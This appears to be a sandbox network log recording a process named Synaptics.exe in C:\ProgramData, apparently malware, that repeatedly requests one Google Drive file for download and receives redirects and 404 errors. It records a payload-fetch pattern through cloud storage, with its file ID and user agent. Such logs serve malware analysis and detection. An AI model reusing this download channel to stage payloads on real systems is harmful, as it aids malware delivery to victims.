2025-01-02 19:29:37 UTC | 1314 | IN | HTTP/1.1 303 See Other
Content-Type: application/binary
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Thu, 02 Jan 2025 19:29:37 GMT
Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
Strict-Transport-Security: max-age=31536000
Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
Content-Security-Policy: script-src 'report-sample' 'nonce-GFYliINaKJjUZHIpC7c6GQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
Cross-Origin-Opener-Policy: same-origin
Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
Server: ESF
Content-Length: 0
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Connection: close


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            2192.168.2.949802172.217.18.144437712C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2025-01-02 19:29:38 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Host: docs.google.com
                                                                                            Cache-Control: no-cache
                                                                                            2025-01-02 19:29:38 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                            Content-Type: application/binary
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:29:38 GMT
                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-oJHZ-47rAc6y57KNA6yMSQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Server: ESF
                                                                                            Content-Length: 0
                                                                                            X-XSS-Protection: 0
                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                            X-Content-Type-Options: nosniff
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Connection: close


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            3 | 192.168.2.9 | 49803 | 216.58.206.65 | 443 | 7712 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            2025-01-02 19:29:38 UTC | 186 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Cache-Control: no-cache
                                                                                            Host: drive.usercontent.google.com
                                                                                            Connection: Keep-Alive
                                                                                            2025-01-02 19:29:38 UTC | 1602 | IN | HTTP/1.1 404 Not Found
                                                                                            X-GUploader-UploadID: AFiumC4LBabmw4sT-JCsvcoTPhNiO-1m02otZQQGE9xdHg-6PLurMKidHJjFnAIPmCwAqxajN8Dxo38
                                                                                            Content-Type: text/html; charset=utf-8
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:29:38 GMT
                                                                                            P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-wWgwTKH6t-2j3wTNXqfVig' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Content-Length: 1652
                                                                                            Server: UploadServer
                                                                                            Set-Cookie: NID=520=fZA4XEw0IB_O5e5GvvE9ZL61MourSYCLW4n49L-tpYAs5QVL2SSuT-IW2CHvtVC8u_TXQ1NbfC_ymJASow0-5yD5bbl6-5JQobNf0fu6uVZpzjI7nVzUFdgFbVkSalmF1R3Z-YOyhca31ozlkhMmLyLjXTBKKLzeFdtKepte_Mdbpcgn9RZeNQRm; expires=Fri, 04-Jul-2025 19:29:38 GMT; path=/; domain=.google.com; HttpOnly
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                            Connection: close
                                                                                            2025-01-02 19:29:38 UTC | 1602 | IN
                                                                                            Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="NEPg8zrwx1spXaZJeZNu3w">*{margin:0;padding:0}html,code{font:15px/22px arial
                                                                                            2025-01-02 19:29:38 UTC | 50 | IN
                                                                                            Data Ascii: is server. <ins>Thats all we know.</ins></main>


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            4 | 192.168.2.9 | 49804 | 172.217.18.14 | 443 | 7712 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            2025-01-02 19:29:38 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Host: docs.google.com
                                                                                            Cache-Control: no-cache
                                                                                            2025-01-02 19:29:38 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                            Content-Type: application/binary
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:29:38 GMT
                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-zYL4tlKpIHgK3IDfDNmMUg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Server: ESF
                                                                                            Content-Length: 0
                                                                                            X-XSS-Protection: 0
                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                            X-Content-Type-Options: nosniff
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Connection: close


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            5 | 192.168.2.9 | 49805 | 216.58.206.65 | 443 | 7712 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            2025-01-02 19:29:38 UTC | 186 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Cache-Control: no-cache
                                                                                            Host: drive.usercontent.google.com
                                                                                            Connection: Keep-Alive
                                                                                            2025-01-02 19:29:38 UTC | 1602 | IN | HTTP/1.1 404 Not Found
                                                                                            X-GUploader-UploadID: AFiumC5PKj0gjZlvsCdru1uVNVr4MdtZMc4AQh_qUyFhF0Dn7iWspvKkjx3XTHzkZihEhVrZwzdUuCM
                                                                                            Content-Type: text/html; charset=utf-8
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:29:38 GMT
                                                                                            P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-62o_YLA8cl8YfHLHe_CXNw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Content-Length: 1652
                                                                                            Server: UploadServer
                                                                                            Set-Cookie: NID=520=YEndgGdZr8HdDID1Vij3o43G0uyZAjGGe75mH81jI0SidRmzMFA61fI8c-2mKRwlZjHee06yoNi2xLr2zeDivgMDa4OM57x0Ftt78Uy8abbKfqNAJMVQaFMthPAL-r46LQxgk8QW_qAVWyDJ7EAv62cj5dyZTVEi6VKrsS9i99dIafXw8VQXYox1; expires=Fri, 04-Jul-2025 19:29:38 GMT; path=/; domain=.google.com; HttpOnly
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                            Connection: close
                                                                                            2025-01-02 19:29:38 UTC | 1602 | IN
                                                                                            Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="f_UUydo-BXs8Sw1cGcdYmg">*{margin:0;padding:0}html,code{font:15px/22px arial
                                                                                            2025-01-02 19:29:38 UTC | 50 | IN
                                                                                            Data Ascii: is server. <ins>Thats all we know.</ins></main>


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            6 | 192.168.2.9 | 49814 | 172.217.18.14 | 443 | 7712 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            2025-01-02 19:29:39 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Host: docs.google.com
                                                                                            Cache-Control: no-cache
                                                                                            2025-01-02 19:29:39 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                            Content-Type: application/binary
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:29:39 GMT
                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-euTvY0uhsMLlGbpPLGDTyA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Server: ESF
                                                                                            Content-Length: 0
                                                                                            X-XSS-Protection: 0
                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                            X-Content-Type-Options: nosniff
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Connection: close


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            7 | 192.168.2.9 | 49813 | 172.217.18.14 | 443 | 7712 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            2025-01-02 19:29:39 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Host: docs.google.com
                                                                                            Cache-Control: no-cache
                                                                                            2025-01-02 19:29:39 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                            Content-Type: application/binary
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:29:39 GMT
                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-LLDIVZ1RQW91AuoQidvRRw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Server: ESF
                                                                                            Content-Length: 0
                                                                                            X-XSS-Protection: 0
                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                            X-Content-Type-Options: nosniff
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Connection: close


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            8 | 192.168.2.9 | 49815 | 216.58.206.65 | 443 | 7712 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            2025-01-02 19:29:39 UTC | 186 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Cache-Control: no-cache
                                                                                            Host: drive.usercontent.google.com
                                                                                            Connection: Keep-Alive
                                                                                            2025-01-02 19:29:39 UTC | 1594 | IN | HTTP/1.1 404 Not Found
                                                                                            X-GUploader-UploadID: AFiumC6sC2lZrJA-l3hOYAiPt0lyQyjLwqFdVM33GOHBJBpjiv552WQusJ8_F5JMSQZK-z5N
                                                                                            Content-Type: text/html; charset=utf-8
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:29:39 GMT
                                                                                            P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-H2_9HJIzCwczujo_3Z1K_A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Content-Length: 1652
                                                                                            Server: UploadServer
                                                                                            Set-Cookie: NID=520=hVlbUWvKAsXXeF2w1QNF8q5JgoN1tzf87ge04HU4z-izoj3_LDtGDRc8bxdZ01BsH-o2bzsVRFQ5r_WfhaVrhAteUAMZUwwIBUUg2Bex0dX01kJtDPaFFK0wIq1WKZ5eH2OJNc4egmV2sSWKiE-nh0MxGmLMyVzjQur-zpbgCqpOWYbRsspUiMg; expires=Fri, 04-Jul-2025 19:29:39 GMT; path=/; domain=.google.com; HttpOnly
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                            Connection: close
                                                                                            2025-01-02 19:29:39 UTC | 1594 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="QA8lH4PLasGzpIJNEwOIGw">*{margin:0;padding:0}html,code{font:15px/22px arial
                                                                                            2025-01-02 19:29:39 UTC | 58 | IN | Data Ascii: nd on this server. <ins>Thats all we know.</ins></main>


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            9 | 192.168.2.9 | 49816 | 216.58.206.65 | 443 | 7712 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            2025-01-02 19:29:39 UTC | 186 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Cache-Control: no-cache
                                                                                            Host: drive.usercontent.google.com
                                                                                            Connection: Keep-Alive
                                                                                            2025-01-02 19:29:39 UTC | 1602 | IN | HTTP/1.1 404 Not Found
                                                                                            X-GUploader-UploadID: AFiumC6Hcwz4wxkCELk8Qx9hid7Tand15HZ9j3eCHIdF6Lxhiok9ZF1vOGm0rCWCFGchKW9Y4A6nLLs
                                                                                            Content-Type: text/html; charset=utf-8
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:29:39 GMT
                                                                                            P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-h4CCyWIbjl7YTN0uvsjLtw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Content-Length: 1652
                                                                                            Server: UploadServer
                                                                                            Set-Cookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs; expires=Fri, 04-Jul-2025 19:29:39 GMT; path=/; domain=.google.com; HttpOnly
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                            Connection: close
                                                                                            2025-01-02 19:29:39 UTC | 1602 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="dPVHMymehDxwMRaurqnrKw">*{margin:0;padding:0}html,code{font:15px/22px arial
                                                                                            2025-01-02 19:29:39 UTC | 50 | IN | Data Ascii: is server. <ins>Thats all we know.</ins></main>


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            10 | 192.168.2.9 | 49824 | 172.217.18.14 | 443 | 7712 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            2025-01-02 19:29:40 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Host: docs.google.com
                                                                                            Cache-Control: no-cache
                                                                                            2025-01-02 19:29:40 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                            Content-Type: application/binary
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:29:40 GMT
                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-kfo-CMRhMkDhCGbGaf7i7g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Server: ESF
                                                                                            Content-Length: 0
                                                                                            X-XSS-Protection: 0
                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                            X-Content-Type-Options: nosniff
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Connection: close


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            11 | 192.168.2.9 | 49825 | 172.217.18.14 | 443 | 7712 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            2025-01-02 19:29:40 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Host: docs.google.com
                                                                                            Cache-Control: no-cache
                                                                                            2025-01-02 19:29:40 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                            Content-Type: application/binary
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:29:40 GMT
                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-f08YOa0wOND3vuqowJ-zuA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Server: ESF
                                                                                            Content-Length: 0
                                                                                            X-XSS-Protection: 0
                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                            X-Content-Type-Options: nosniff
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Connection: close


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            12 | 192.168.2.9 | 49826 | 216.58.206.65 | 443 | 7712 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            2025-01-02 19:29:40 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Cache-Control: no-cache
                                                                                            Host: drive.usercontent.google.com
                                                                                            Connection: Keep-Alive
                                                                                            Cookie: NID=520=YEndgGdZr8HdDID1Vij3o43G0uyZAjGGe75mH81jI0SidRmzMFA61fI8c-2mKRwlZjHee06yoNi2xLr2zeDivgMDa4OM57x0Ftt78Uy8abbKfqNAJMVQaFMthPAL-r46LQxgk8QW_qAVWyDJ7EAv62cj5dyZTVEi6VKrsS9i99dIafXw8VQXYox1
                                                                                            2025-01-02 19:29:40 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                            X-GUploader-UploadID: AFiumC429XhP-hpcchtd5LdC_XfyNf7aJezG5B4iNQmIIyKMt3ouDmTH4ZujKGLXTFl1fiIM
                                                                                            Content-Type: text/html; charset=utf-8
